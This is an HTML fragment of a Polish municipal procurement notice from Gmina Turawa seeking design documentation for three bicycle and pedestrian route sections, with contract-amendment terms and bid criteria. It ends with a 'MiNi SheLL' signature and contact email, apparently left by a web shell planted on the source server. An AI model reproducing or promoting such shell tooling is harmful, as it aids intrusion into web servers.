1)	Zmiany przewidziane w umowie mogą być inicjowane przez Zamawiającego lub przez Wykonawcę.
2)	Zmiany umowy mogą dotyczyć:
a)	wystąpienia wyjątkowych okoliczności, niezależnych od stron umowy, których nie można było przewidzieć w chwili zawierania umowy, a wpływają na jej realizację;
b)	zmiany podwykonawców, których udział w realizacji przedmiotu umowy zaakceptował Zamawiający;
c)	zmiany jakości lub innych parametrów charakterystycznych dla objętego proponowaną zmianą elementu prac;
d)	zmiany w kolejności i terminach wykonywania prac;
e)	zmiany ilości prac - według potrzeb;  
f)	rezygnacji z wykonania części prac;
g)	terminu wykonania przedmiotu umowy, jeżeli wystąpią przyczyny niezależne od działań leżących po stronie Wykonawcy;
3)	Zamawiający dopuszcza możliwość wystąpienia w trakcie realizacji przedmiotu umowy konieczności wykonania prac, których nie można było przewidzieć;
4)	Warunkiem dokonania zmian, o których mowa w ust. 2), jest złożenie wniosku przez stronę inicjującą, który zawiera:
a)	opis propozycji zmiany;
b)	uzasadnienie zmiany;
c)	obliczenie kosztów zmiany zgodnie z zasadami określonymi w umowie, jeżeli zmiana będzie miała wpływ na wynagrodzenie wykonawcy;
d)	opis wpływu zmiany na termin wykonania umowy.
5)	Zmiany, o których mowa w ust. 2), mogą zostać dokonane, jeżeli ich uzasadnieniem są niżej wymienione okoliczności:
a)	wystąpienia konieczności wykonania dodatkowych i niemożliwych do przewidzenia prac, których zrealizowanie jest niezbędne z uwagi na zmianę obowiązujących przepisów lub treść uzyskanych warunków przyłączenia, 
b)	opóźnienia, utrudnienia lub przeszkód spowodowanych przez lub dających się przypisać Zamawiającemu, 
c)	wydłużenia postępowania w sprawie uzyskania decyzji administracyjnych, niezawinionego przez Wykonawcę, 
d)	niemożności dostarczenia Wykonawcy opracowań i badań leżących po stronie Zamawiającego w ustalonym terminie, 
e)	obniżenie kosztu wykonania prac; 
f)	zmiana obowiązujących przepisów prawa;
g)	podniesienie bezpieczeństwa wykonywania prac;
h)	opóźnienia, utrudnienia, zawieszenia w wykonywaniu prac lub przeszkody spowodowane z przyczyn niezależnych od działań Wykonawcy;
i)	zaistnienie nieprzewidzianych w umowie warunków geologicznych, hydrogeologicznych, wykopalisk, a także innych przeszkód lub skażeń uniemożliwiających kontynuowanie umowy na przewidzianych w niej warunkach;
j)	siła wyższa. 
k)	wystąpienia innych szczególnych okoliczności, za które Wykonawca nie jest odpowiedzialny.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.turawa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Turawa,
ul. Opolska 39c,
46-045 Turawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.07.2016 godzina 10:00, miejsce: Urząd Gminy Turawa,
ul. Opolska 39c,
46-045 Turawa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt może zostać sfinansowany ze Środków Unii Europejskiej Aglomeracji Opolskiej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie częściowe nr I - dokumentacja projektowa - Budowa dróg rowerowych i tras pieszo-rowerowych na terenie gminy Turawa - odcinek nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Początek odcinka rozpoczyna się w miejscu włączenia do istniejącego ciągu pieszo - rowerowego  na rondzie z ul. Oleską (DK45) w Zawadzie. Zaprojektować należy przedłużenie istniejącego ciągu pieszo-rowerowego wzdłuż ul. Turawskiej po jej południowej stronie na odcinku ok. 180 m, a następnie jego kontynuację wzdłuż drogi powiatowej przez miejscowość Kotórz Mały i Turawę.  W pobliżu dworca kolejowego w miejscowości Kotórz Mały należy zaprojektować parking dla rowerów w formule Bike and Ride (B+R) umożliwiający pozostawienie roweru i dalszą podróż koleją. Na rzece Mała Panew w miejscowości Turawa należy zaprojektować kładkę pieszo - rowerową zlokalizowaną równolegle do istniejącego mostu po stronie zachodniej. Tuż za mostem należy zaprojektować rozwiązanie komunikacyjne skrzyżowania dróg powiatowych, o długości około 6,3 km.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.24.80.00-8, 71.32.23.00-4, 90.72.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie częściowe nr II - dokumentacja projektowa - Budowa dróg rowerowych i tras pieszo-rowerowych na terenie gminy Turawa - odcinek nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Obejmuje odcinek od zakończenia zadania częściowego nr I, czyli od skrzyżowania dróg powiatowych za mostem na rzece Mała Panew w Turawie do skrzyżowania z ul. Harcerską w okolicy Jeziora Turawskiego, o długości około 2,8 km.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.24.80.00-8, 71.32.23.00-4, 90.72.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie częściowe nr III - dokumentacja projektowa - Budowa dróg rowerowych i tras pieszo-rowerowych na terenie gminy Turawa - odcinek nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rozpoczyna się na granicy miasta Opole w pobliżu centrum handlowego Turawa Park w miejscu włączenia do istniejącej drogi serwisowej. Drogę rowerową należy zaprojektować w ciągu gruntowych dróg leśnych i polnych do granic miejscowości Zawada, a następnie ul. Brzegową, ul. Zieloną, ul. Wodociągową do włączenia w istniejący ciąg pieszo - rowerowy na ul. Oleskiej (DK 45), następnie trasa rowerowa biegnie drogą serwisową, aż do ronda z ul. Turawską (DP1705) oraz istniejącym ciągiem pieszo - rowerowym, o długości około 4,6 km.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.24.80.00-8, 71.32.23.00-4, 90.72.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com